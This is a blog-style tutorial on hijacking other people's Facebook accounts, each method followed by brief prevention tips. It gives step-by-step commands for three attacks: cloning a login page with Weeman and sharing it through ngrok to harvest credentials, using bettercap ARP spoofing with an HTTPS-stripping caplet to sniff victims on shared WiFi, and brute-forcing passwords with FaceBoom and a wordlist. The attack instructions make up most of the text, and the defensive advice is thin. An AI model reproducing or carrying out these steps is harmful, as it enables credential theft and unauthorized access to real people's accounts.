Table of Contents
How to hack Facebook – Facebook is a great social media platform. More users are using this compared to other social media. The more users there are the more hackers are also there. More and more fake profiles are found. Facebook security is low compared to other social media.
In this post we will look at how to hack Facebook, there are more ways to hack Facebook account and see the best of them in this post. Not only that but we can also discuss how to protect our Facebook account from it.
Most hackers use Linux operating system to hack Facebook accounts. Now you can use all the tools available on Linux via Termux on Android.
Hack Facebook with phishing
The phishing method is the first choice of hackers when it comes to hacking a Facebook account. This is because there is not much work to be done when using this phishing method, but you need to know a limited amount of information about the target like email, phone number, etc.
There are numerous tools for Facebook phishing on GitHub, but a few phishing tool developers do not constantly update so such tools do not clone the current login page because all tools have a pre-download template.
But now the tool we are going to use will clone the current login page every time. A professional hacker will make a hacking script for himself. If you want to create your own Facebook phishing page I have already created the post and below is the link to that post. How to create a phishing page?
The name of the phishing tool we are going to use is Weeman. This tool can be used on Termux, windows, and Linux. First, type the following command in your terminal to download this tool to your terminal.
git clone https://github.com/samyoyo/weeman.git
Move your directory to the Weeman folder after downloading the Weeman tool.
Now you can run the Weeman tool using python2
Now type one after the other in your terminal like the model command given below.
- set url (your Target social media login page URL)
- set ip (your IP address)
- set port (your port)
- set action_url (again past your Target social media login page URL)
Now you have the phishing page you need, all you have to do is send this phishing page to your target, but there is a problem, the phishing page that has been created is hosted on your local server so you can send this phishing link to others. No, even if you send it, it will not work. So run ngrok on your device and share the link to your target.
Attempting to login to your target by clicking on the ngrok link you sent, the username and password they can type in will appear in your terminal. See the image below for an example.
How to prevent your Facebook from phishing attack?
Phishing attacks and fishing are the same. When we catch fish we put the bait in the water and wait for the fish to bite the bait, just like in a phishing attack. The hacker sends the phishing link to someone and clicks on the link and waits for them to type in the username and password.
So you can protect yourself from this attack if you do not click on the phishing link. Also, phishing links can be easily found i.e. if any other domain name other than https://www.facebook.com has a Facebook login page it is a phishing page.
If you still have trouble finding the phishing link, first type the wrong username and password and then log in. In doing so, if the page indicates that the username and password are incorrect without being redirected to any other page, it is the original Facebook login page.
Hack Facebook with DNS Spoofing
This attack can only be done when the hacker and the victim are connected to the same WiFi network. You do not need to know programming to perform this DNS spoofing attack. It can be done easily using the Bettercap tool, android has numerous applications.
To install the Bettercap tool on your Linux type the following command on your Linux terminal.
sudo apt-get install bettercap
This Bettercap tool will only hack the HTTP website, but now all websites are on HTTPS so you need to link the HTTPS script to this Bettercap tool. HTTPS spoofing script is given below. password: www.errorsfind.com
Now extract the downloaded https bypass script and save the https bypass script in /usr/share/bettercap/caplets/ location.
First you open bettercap caplets folder > and open your terminal on that place > then type this below command on your terminal
sudo rm -rf htshjack
First you will open your terminal on your new htshjack folder place > then type this below command on your terminal
sudo cp -r hstshijack /usr/share/bettercap/caplets/
Now open the Bettercap tool and type the following command one after the other.
net.probe on net.recon on set arp.spoof.fullduplex true set arp.spoof.targets ( target IP address) arp.spoof on set net.sniff.local true net.sniff on
After completing all the steps given above, you need to access the caplets and select hstshijack/hstshijack.
After enabling hstshijack caplet your target will open any website, it will be redirected from HTTPS and open at HTTP. This allows us to view all the data that they can view and that they can type through the Bettercap terminal.
How to prevent Facebook from DNS spoofing?
If you want to protect your Facebook account from DNS spoofing you must not connect your device to public wifi. More and more hackers are giving away free wifi and stealing everyone’s information.
Your information will be secure unless you connect to the wifi of someone other than your wifi. If you are an android user, install the Hakuna application. This application will notify you by notification whoever tries to hack you from the wifi network so you can leave that wifi immediately.
Hack Facebook with Bruteforce attack
In the hacking method, only a brute-force attack can take place without target permission. However, to perform a brute-force attack, you need to gather some information about the target, such as date of birth, phone number, nickname, pet name, etc. Hackers must have guessing skills to perform this attack so that they can guess what kind of password the target has.
The most important for this hacking is the password file that hackers can create. Github has many tools for composing a password file, and Linux has some of the best tools for preinstalling. If you are in doubt about creating a password file, find out by following the link below.
For this brute-force attack, you first need to find the username of the target, it is very simple to copy the profile URL of the target and paste it into the website given below to find the user id.
After finding the user id of the target, download the FaceBoom tool using the link below to find the password.
git clone https://github.com/Oseid/FaceBoom.git
Then now change the directory of this tool with the “Cd” command
cd FaceBoom ls
Now you can easily find the password using the password file you have created and the user id you have found.
python3 faceboom.py -t (your target id) -w (your password file)
How to prevent Facebook from a brute-force attack?
Although the Facebook team has taken a few steps to protect you from the brute-force attack, you need to keep your password very strict so that your password will be more powerful when you use a special character, number, lower case, uppercase, etc in your password.
The above 3 hacking methods are the most commonly used by hackers. I hope this post was helpful to you and you can ask me through the command section if you have any doubts.